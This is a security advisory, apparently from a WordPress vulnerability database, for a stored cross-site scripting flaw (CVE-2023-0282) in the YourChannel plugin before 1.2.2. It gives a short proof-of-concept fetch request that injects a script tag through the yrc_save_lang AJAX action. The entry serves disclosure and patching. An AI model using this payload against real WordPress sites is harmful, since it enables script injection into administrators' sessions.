YourChannel < 1.2.2 – Subscriber+ Stored XSS | CVE 2023-0282 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks.

Proof of Concept

fetch('http://localhost:10008/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=yrc_save_lang&yrc_lang[Videos]="><script>alert(1)</script>'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

The script will be exploited on the YourChannel admin page.

Affects Plugins

Fixed in 1.2.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

93693d45-5217-4571-bae5-aab8878cfe62

Timeline

Publicly Published

2023-01-13 (about 1 years ago)

Added

2023-01-13 (about 1 years ago)

Last Updated

2023-01-13 (about 1 years ago)

Other

Published

Title

Published

2016-12-07

Title

WooCommerce <= 2.6.8 - Authenticated Tax-Rate CSV XSS

Published

2021-06-29

Title

WP Offload SES Lite < 1.4.5 - Stored Cross-Site Scripting (XSS)

Published

2024-01-19

Title

GigPress <= 2.3.29 - Admin+ Stored Cross Site Scripting

Published

2017-07-13

Title

Download Manager <= 2.9.49 - Cross-Site Scripting (XSS)

Published

2024-03-15

Title

Extensions For CF7 < 3.0.7 - Unauthenticated Stored Cross-Site Scripting